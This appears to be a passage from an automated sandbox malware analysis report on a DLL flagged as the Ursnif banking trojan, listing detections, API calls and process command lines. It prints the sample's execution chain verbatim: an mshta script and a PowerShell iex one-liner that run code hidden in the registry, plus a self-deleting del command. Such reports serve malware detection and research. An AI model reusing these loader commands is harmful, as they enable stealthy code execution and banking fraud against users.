                      Source: Yara matchFile source: 00000002.00000003.344393693.00000000053EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297638770.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297792500.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000003.416255152.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.342664941.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297847872.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.397268016.0000000006168000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5132, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6644, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 4084, type: MEMORYSTR
                      Source: Yara matchFile source: 2.3.rundll32.exe.50494a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.5596b40.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.5596b40.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.55694a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.3430000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.50494a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.55694a0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.54ea4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.54ea4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.464317231.000000000526F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.343634422.0000000005569000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.461814934.0000000005049000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000000.414668534.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000000.413947295.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.343553499.00000000054EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000000.415531783.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: loaddll32.exe, 00000000.00000002.254755088.000000000095B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                      E-Banking Fraud

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000002.00000003.297325888.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297834584.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297429352.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297681439.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.343681335.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297590765.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.415812093.000001E636EFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000003.416371744.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.344393693.00000000053EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297638770.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297792500.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000003.416255152.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.342664941.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297847872.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.397268016.0000000006168000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5132, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6644, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 4084, type: MEMORYSTR
                      Source: Yara matchFile source: 2.3.rundll32.exe.50494a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.5596b40.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.5596b40.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.55694a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.3430000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.50494a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.55694a0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.54ea4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.54ea4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.464317231.000000000526F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.343634422.0000000005569000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.461814934.0000000005049000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000000.414668534.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000000.413947295.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.343553499.00000000054EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000000.415531783.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Disables SPDY (HTTP compression, likely to perform web injects)
                      Source: C:\Windows\explorer.exeRegistry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_03435FBB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,

                      System Summary

                      barindex
                      Writes registry values via WMI
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: xaj0e933Uv.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_03434BF1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_03431645
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0343829C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0347B238
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0348FF4D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_034767CA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0348D7F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0348154D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_03493DB0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0347F2A9 CreateProcessAsUserA,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_03436D0A NtMapViewOfSection,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0343190C GetProcAddress,NtCreateSection,memset,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_03434321 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_034384C1 NtQueryVirtualMemory,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_03485312 NtWriteVirtualMemory,VirtualProtectEx,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_03482331 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_03487950 NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0347710A GetProcAddress,NtCreateSection,memset,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_034861AE GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0348A806 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_034800DC RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_03480782 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0348BE80 NtMapViewOfSection,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_03486DE0 memcpy,memcpy,memcpy,NtUnmapViewOfSection,NtClose,memset,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0347C431 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_034774AE NtQueryInformationProcess,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_03485220 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0348EAC5 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_03483829 NtQuerySystemInformation,RtlNtStatusToDosError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_034710C7 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0347D77A NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0347B7D5 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_034736BB NtGetContextThread,RtlNtStatusToDosError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_034764C4 memset,NtQueryInformationProcess,
                      Source: xaj0e933Uv.dllBinary or memory string: OriginalFilenamemyfile.exe$ vs xaj0e933Uv.dll
                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                      Source: xaj0e933Uv.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: xaj0e933Uv.dllVirustotal: Detection: 40%
                      Source: xaj0e933Uv.dllReversingLabs: Detection: 47%
                      Source: xaj0e933Uv.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\xaj0e933Uv.dll"
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\xaj0e933Uv.dll",#1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\xaj0e933Uv.dll",#1
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Jqlc='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Jqlc).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name axgpbo -value gp; new-alias -name slctai -value iex; slctai ([System.Text.Encoding]::ASCII.GetString((axgpbo "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m5pod5s5\m5pod5s5.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5F15.tmp" "c:\Users\user\AppData\Local\Temp\m5pod5s5\CSCDE04DA8616441A6AC3074D39CFFC1D3.TMP"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\a1gxko15\a1gxko15.cmdline
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES73F5.tmp" "c:\Users\user\AppData\Local\Temp\a1gxko15\CSCE08F5B5052974B07835021DDCFF1297.TMP"
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\xaj0e933Uv.dll
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\ADE6.bi1"
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\xaj0e933Uv.dll",#1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\xaj0e933Uv.dll",#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name axgpbo -value gp; new-alias -name slctai -value iex; slctai ([System.Text.Encoding]::ASCII.GetString((axgpbo "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m5pod5s5\m5pod5s5.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\a1gxko15\a1gxko15.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5F15.tmp" "c:\Users\user\AppData\Local\Temp\m5pod5s5\CSCDE04DA8616441A6AC3074D39CFFC1D3.TMP"
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES73F5.tmp" "c:\Users\user\AppData\Local\Temp\a1gxko15\CSCE08F5B5052974B07835021DDCFF1297.TMP"
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\xaj0e933Uv.dll
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20220504Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jkorezbb.opv.ps1Jump to behavior
                      Source: classification engineClassification label: mal100.bank.troj.evad.winDLL@25/17@0/1
                      Source: C:\Windows\System32\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_034368BD CreateToolhelp32Snapshot,Process32First,StrStrIA,Process32Next,FindCloseChangeNotification,
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\xaj0e933Uv.dll",#1
                      Source: C:\Windows\System32\control.exeMutant created: \Sessions\1\BaseNamedObjects\{B8EF3798-B76F-AA89-016C-DB7EC5603F92}
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5068:120:WilError_01
                      Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\{F0B43100-8FC3-A2DB-9924-33F6DD98178A}
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{B8713496-B709-AA5B-016C-DB7EC5603F92}
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                      Source: xaj0e933Uv.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: Q5.pdb( source: powershell.exe, 00000012.00000003.417182776.000001E63635E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\m5pod5s5\m5pod5s5.pdb( source: powershell.exe, 00000012.00000003.417182776.000001E63635E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: 5.pdb@ source: powershell.exe, 00000012.00000003.560046822.000001E63635E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000003.417182776.000001E63635E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdb source: rundll32.exe, 00000002.00000003.411412197.0000000006230000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.403782872.0000000006180000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: d:\in\the\town\where\ahung.pdb source: xaj0e933Uv.dll
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\a1gxko15\a1gxko15.pdb source: powershell.exe, 00000012.00000003.417182776.000001E63635E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000002.00000003.411412197.0000000006230000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.403782872.0000000006180000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: Q5.pdb source: powershell.exe, 00000012.00000003.560046822.000001E63635E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: 5.pdb( source: powershell.exe, 00000012.00000003.560046822.000001E63635E000.00000004.00000020.00020000.00000000.sdmp
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0343828B push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_03437EA0 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_034938A0 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_03493D9F push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_03473495 push ecx; mov dword ptr [esp], 00000002h
                      Source: xaj0e933Uv.dllStatic PE information: section name: .erloc
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_034786AD LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,
                      Source: xaj0e933Uv.dllStatic PE information: real checksum: 0x79835 should be: 0x765e4
                      Source: m5pod5s5.dll.21.drStatic PE information: real checksum: 0x0 should be: 0xbf97
                      Source: a1gxko15.dll.24.drStatic PE information: real checksum: 0x0 should be: 0x2015
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m5pod5s5\m5pod5s5.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\a1gxko15\a1gxko15.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m5pod5s5\m5pod5s5.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\a1gxko15\a1gxko15.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\m5pod5s5\m5pod5s5.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\a1gxko15\a1gxko15.dllJump to dropped file

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000002.00000003.297325888.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297834584.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297429352.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
